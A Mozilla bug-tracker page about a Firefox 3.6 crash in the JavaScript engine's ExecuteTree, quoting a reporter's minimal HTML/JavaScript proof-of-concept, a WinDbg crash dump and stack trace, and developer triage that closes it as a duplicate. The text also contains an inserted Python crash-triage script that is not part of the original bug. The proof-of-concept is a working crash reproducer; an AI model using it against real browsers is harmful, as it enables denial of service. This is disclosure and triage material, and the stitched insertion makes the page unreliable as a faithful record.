Closed Bug 651221 Opened 10 years ago Closed 10 years ago

Investigate crash [@ ExecuteTree ]

Categories

(Core :: JavaScript Engine, defect)

1.9.2 Branch
defect
Not set
normal

Tracking

VERIFIED DUPLICATE of bug 650874

People

(Reporter: bsterne, Unassigned)

Details

(Whiteboard: [sg:dupe 650874])

Attachments

(1 file)

Donato Ferrante reported this to security@m.o today.  The testcase crashed Firefox 3.6.16 for me on OS X, but not trunk:
bp-3694baee-d78b-49e3-9d0a-961f62110419

The rest of Donato's email follows:

-----

Hi,

I have just found a vulnerability in Firefox while it handles a
specially crafted JavaScript.

-----------------
Affected Software
-----------------
	+ Firefox 3.6.x ( tested on 3.6.16 and 3.6.17 )
	- Firefox 4 seems to be non-vulnerable to this issue

----------------
Proof Of Concept
----------------
This is the minimal PoC to reproduce the issue:

<html>
	<script>
		var Fun=eval("eval");             // required
		for(u=0; u <3; u++){ Fun(); }     // required - it MUST be >= 3
		alert("Not bug :(");              // extra - can be removed
	</script>
</html>

(9a4.49c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=053ac880 ebx=03dd5800 ecx=00000007 edx=004dc778 esi=00000000 edi=004dc4f0
02d9fee0 esp=004dc4b0 ebp=004dc4e8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
02d9fee0 8b0504000000    mov     eax,dword ptr ds:[4] ds:0023:00000004=????????

0:000> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
004dc4e8 69d8ab51 0x2d9fee0
004de8b8 69d8b2d4 js3250!ExecuteTree+0x3c1 [e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jstracer.cpp @ 6283]
004de930 69d99a5f js3250!js_MonitorLoopEdge+0x3e4 [e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jstracer.cpp @ 6749]
004deb4c 69db48e5 js3250!js_Interpret+0x88f [e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jsops.cpp @ 912]
004debd0 69dc7011 js3250!js_Execute+0x1a5 [e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jsinterp.cpp @ 1601]
004debf8 5c8be432 js3250!JS_EvaluateUCScriptForPrincipals+0x61
[e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jsapi.cpp @ 5058]
004dec78 5c8c2c8d xul!gfxTextRun::GlyphRunIterator::NextRun+0x7282
004ded30 5c93579c xul!gfxTextRun::GlyphRunIterator::NextRun+0xbadd
004ded74 5c8c8374 xul!gfxSkipCharsIterator::gfxSkipCharsIterator+0x107d
004ded8c 5c838cbc xul!gfxWindowsFontGroup::MakeTextRun+0xe3
004deda8 6ba490c9 xul!NS_CycleCollectorSuspect2_P+0xebc
004dedc0 6ba49a1d MOZCRT19!expand+0x13c9
004dedcc 5c836503 MOZCRT19!malloc+0x3d
00000000 00000000 xul!gfxWindowsFontGroup::InitTextRunUniscribe+0x232

The stack I got does look pretty bad:
bp-3694baee-d78b-49e3-9d0a-961f62110419

Appears we may be calling random memory there.  We have a couple of closed bugs that have this same signature, but one doesn't have a testcase and the other's testcase looks quite different.

Is this the same as bug 650874?

(In reply to comment #1)
> The stack I got does look pretty bad:
> bp-3694baee-d78b-49e3-9d0a-961f62110419
> 
> Appears we may be calling random memory there.

No, ExecuteTree calls JITted code so the unknown address is expected there. It looks like a null deref to me, except with the caveat that I don't know if you can mislead the JIT into using some other non-null value there.

(In reply to comment #2)
> Is this the same as bug 650874?

Looks like it to me. The essential features of this and the minimized testcase there are the same.
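The triage reasoning in the comments above (an unresolved top frame under ExecuteTree is expected for trace-JIT code, and a faulting address of 4 reads like a null-plus-offset dereference rather than a wild pointer) can be encoded as a small crash-log classifier. The script below is an added example, not part of this bug or of Mozilla's tooling; it parses the WinDbg output quoted in the report (a trimmed copy is embedded as constructed sample input) and reports the fault address class and whether the unknown-module frame is the expected JIT shape. The 64 KiB null-page limit is an assumption about Windows user-space layout used only as a triage heuristic; as the comment notes, a null-page fault is benign only if the pointer cannot be steered elsewhere, which this script does not decide.

```python
import re

# Constructed sample: the relevant lines of the WinDbg output quoted in this
# report, trimmed to what the helpers below look at.
SAMPLE_CRASH = """\
(9a4.49c): Access violation - code c0000005 (first chance)
eax=053ac880 ebx=03dd5800 ecx=00000007 edx=004dc778 esi=00000000 edi=004dc4f0
02d9fee0 8b0504000000    mov     eax,dword ptr ds:[4] ds:0023:00000004=????????
0:000> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
004dc4e8 69d8ab51 0x2d9fee0
004de8b8 69d8b2d4 js3250!ExecuteTree+0x3c1
004de930 69d99a5f js3250!js_MonitorLoopEdge+0x3e4
"""

# Assumption: the low 64 KiB of a Windows user-mode address space is never
# mapped, so faults below it are treated as NULL + small offset.
NULL_PAGE_LIMIT = 0x10000

# "ds:0023:00000004=????????" -> the address WinDbg could not read.
FAULT_RE = re.compile(r"ds:[0-9a-f]{4}:([0-9a-f]{8})=\?{8}")
# One "k" stack line: ChildEBP, RetAddr, then the symbol or bare address.
FRAME_RE = re.compile(r"^[0-9a-f]{8}\s+[0-9a-f]{8}\s+(\S+)", re.M)


def faulting_address(dump):
    """Return the unreadable memory address from the faulting instruction, or None."""
    m = FAULT_RE.search(dump)
    return int(m.group(1), 16) if m else None


def classify_fault(addr):
    """Coarse bucket for the fault address: null page vs. anything else."""
    if addr is None:
        return "unknown"
    if addr < NULL_PAGE_LIMIT:
        return "null-page-deref"
    return "wild-access"


def frames(dump):
    """Symbols (or bare addresses) of each frame in the 'k' output, top first."""
    return FRAME_RE.findall(dump)


def jit_frame_expected(frame_list):
    """True when the top frame is an unresolved bare address whose caller is
    ExecuteTree: the normal shape for a fault inside trace-JIT code, so the
    'Frame IP not in any known module' warning alone is not a corrupted stack."""
    if len(frame_list) < 2:
        return False
    top, caller = frame_list[0], frame_list[1]
    return top.startswith("0x") and "ExecuteTree" in caller


def triage(dump):
    """Summarise a WinDbg crash capture for a first-pass security triage."""
    addr = faulting_address(dump)
    return {
        "fault_address": addr,
        "kind": classify_fault(addr),
        "jit_frame_expected": jit_frame_expected(frames(dump)),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_CRASH))
```

Run against the sample, the summary is a fault at address 4 classed as a null-page dereference with the JIT frame shape flagged as expected; a fault address outside the null page (for example one of the register values) is classed as a wild access, which is the case that warrants a closer look at pointer provenance.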
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:critical?] → [sg:dupe 650874]
Duplicate of bug: 650874
Status: RESOLVED → VERIFIED
Group: core-security